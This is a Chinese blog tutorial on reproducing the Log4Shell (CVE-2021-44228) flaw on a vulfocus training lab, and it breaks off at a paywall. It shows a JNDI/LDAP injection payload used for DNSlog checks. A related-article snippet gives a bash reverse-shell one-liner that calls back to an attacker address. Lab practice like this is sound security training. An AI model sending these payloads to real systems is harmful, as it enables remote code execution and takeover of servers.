Log4j拿shell(vulfocus靶场详细教程)

已于 2022-04-19 16:51:35 修改
阅读量4.6k 收藏 1
点赞数 1
文章标签: 安全 web安全 渗透测试
于 2022-04-16 23:22:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzezhi/article/details/124222348
版权
本文详细介绍了2021年12月9日公开的Log4j2远程代码执行漏洞,该漏洞允许攻击者通过JNDI注入在目标服务器上执行任意代码。通过DNSlog验证和Burp Suite,展示了如何构造并发送payload来复现漏洞,最终实现反弹shell获取权限的过程。
摘要由CSDN通过智能技术生成

简介

2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用 ${} 关键标识符触发 JNDI 注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

复现

直接在vulfocus起一个靶场环境

burp抓包,看到提示参数是payload

dnslog验证

先来使用dnslog验证一下

${jndi:ldap://“ip”/poc}    这里的ip是dnslog获取到的域名

生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限

 反弹shell

vps开启监

最低0.47元/天 解锁文章
@A1
关注
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1327
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocuslog4j2靶场docker,使用Kali系统进行复现实验。
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3497
vulfocus靶场log4j2漏洞复现
火爆全网的Log4j 漏洞复现GetShell
柠檬i的博客
12-26 8213
Apache Log4j2 JNDI注入漏洞(CVE-2021-44228),可以任意命令执行
vulfocus::rocket:Vulfocus是一个扩展集成平台,将打破环境docker合并,放入即可使用,开箱即用
02-02
欢迎来到Vulfocus :rocket: Vulfocus是一个突破集成平台,将突破环境docker扩展,投入即用,开箱即用。 Vulfocus官网: ://fofapro.github.io/vulfocus/ 在线演示: : 背景 进攻靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似的dvwa,sqli-labs这类的开源项目,但破坏环境比较固定,使用完一次后就失去其作用。建造的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于突破性的环境耦合使用多的是vulhub,但是作为企业,高校等以及相关的培训,单纯的突破环境不一定能满足使用的需求,所以我们基于当下的一些靶场项目做出了一些小的改进来符合我们的一些需求,从而增加了标志的形式,来满足一些考核与验证的需求,可以对我们内部人员能力进行考核,于是Vulfocus就诞生了。 认识Vulfocus 因为Vulfocus一个突破性的集成平台,所以可以无限向里添加裂缝环境没有限制,而是是你的内存足够大。破坏下一无法启动的现象。 Vulfocus的docker仓库 Vu
Vulfocus 开源项目教程
最新发布
gitblog_00734的博客
08-09 753
Vulfocus 开源项目教程 vulfocus????Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。项目地址:https://gitcode.com/gh_mirrors/vu/vulfocus 1. 项目介绍 Vulfocus 是一个基于 Docker 的在线安全研究平台,它提供了丰富的漏洞靶场环境,方便安全研究人员学习、测试和研究网络漏洞。Vulf...
Log4j 漏洞复现GetShell
weixin_43102772的博客
03-09 529
Log4j2 漏洞复现GetShell
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 2061
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
【网络安全---vulfocus】安装vulfocus教程
m0_67844671的博客
09-09 2658
安装docker镜像,安装vulfocus
Vulfocus 入门+初级
大雾
05-20 3674
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
log4j2核弹级漏洞靶场复现(反弹shell
m0_56773673的博客
01-04 4139
十分钟log4j2靶场漏洞复现!!!
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场
yang1234567898的博客
04-18 3227
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Log4jShell漏洞修复分析
u014419174的博客
12-15 2826
log4jShell漏洞修复分析
LOG4J(CVE-2021-44228)-靶场复现
m0_66376444的博客
04-06 298
③在http中找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会下载下来,然后发现bug是一个.class文件,就会去执行里面的代码,从而实现注入攻击者就可以通过shell实现任意的命令执行,造成严重危害。②通过jndi的lookup()方法去解析该URL:jndi:rmi://4rujx1.dnslog.cn/bug,解析到rmi,就会去4rujx1.dnslog.cn的rmi服务找名为bug的资源,如果找不到就会去http服务中找。7.成功获取到了shell
Vulfocus安装过程
tlovejr的博客
03-01 4371
一、Vulfocus背景 漏洞靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似 dvwa、 sqli-labs 这类的开源项目,但是漏洞环境比较固定,使用完一次后就失去其作用。搭建的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于漏洞环境镜像使用多的是 vulhub,但是对于我们个人来说,要去构建一个新的漏洞环境确实麻烦,还有配置什么的,单纯的漏洞环境不一定能满足使用的需求,所以Vulfocus就基于当下的一些靶场项目做出了小小的改进来符合需求
Apache Log4j 复现靶场
hackzkaq的博客
12-14 3317
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 安全圈大动荡,新出现的漏洞危害性极大,此漏洞是可以执行任意代码,群里也流传了一句话:“这已经相当于黑客已经攻入计算机,可以为所欲为了“.很恐怖,一个漏洞的出现让多少人手忙脚乱。 新出了漏洞很多人都会想着去复现漏洞,为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入复现,亲测可以直接拿shell。切记要遵守网络安全靶场复现地址:https://hack.zkaq.cn/battle/target?id=5
插件分享 | Vulfocus 快速启动靶场环境一键打靶
m0_46699477的博客
12-01 6382
作为安全小白的插件作者,曾经最困惑的就是,拿着自带强大靶标漏洞库的 Goby 去扫描,却总是很难找到漏洞的影子,这让起步去学习安全知识这件事变得困难,后来了解到靶场工具,开始使用 Vulfocus,一个想法随之产生:将 Vulfocus 通过插件的方式集成到 Goby,更方便快捷的一键启动漏洞环境一键扫描漏洞。于是现在的这款插件应运而生~
靶场vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 3109
构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
Log4j入门与详细配置教程
Log4j实战(入门、详解)是一篇深入介绍Apache开源日志管理框架Log4j的文章。该文章旨在帮助读者理解并掌握如何在Java项目中有效地使用Log4j进行日志记录和管理。以下是文章的主要知识点: 1. **Log4j简介**: - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值